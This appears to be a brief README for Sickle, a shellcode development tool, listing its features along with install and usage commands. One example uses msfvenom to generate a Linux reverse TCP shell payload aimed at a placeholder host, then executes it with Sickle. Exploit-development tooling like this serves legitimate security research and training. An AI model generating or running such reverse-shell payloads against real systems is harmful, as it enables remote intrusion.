Sickle is a shellcode development tool, created to speed up the various steps needed to create functioning shellcode.
Sickle can aid in the following:
– Identifying instructions resulting in bad characters
– Accept shellcode via stdin and format it / detect bad characters
– Execute shellcode in both Windows and Linux environments
– Compare reversed shellcode to original
– Disassemble shellcode into assembly language (ARM, x86, etc)
+ apt-get install python3-pip
+ pip3 install capstone
pip3 install capstone
git clone https://github.com/wetw0rk/Sickle && cd Sickle
chmod +x sickle.py
cp sickle.py /usr/bin/sickle
msfvenom -p linux/x64/shell_reverse_tcp LHOST=(your IPAddress) LPORT=1 -f raw -o test
sickle -r test --run-shellcode
sickle -r example -b "\xa0a"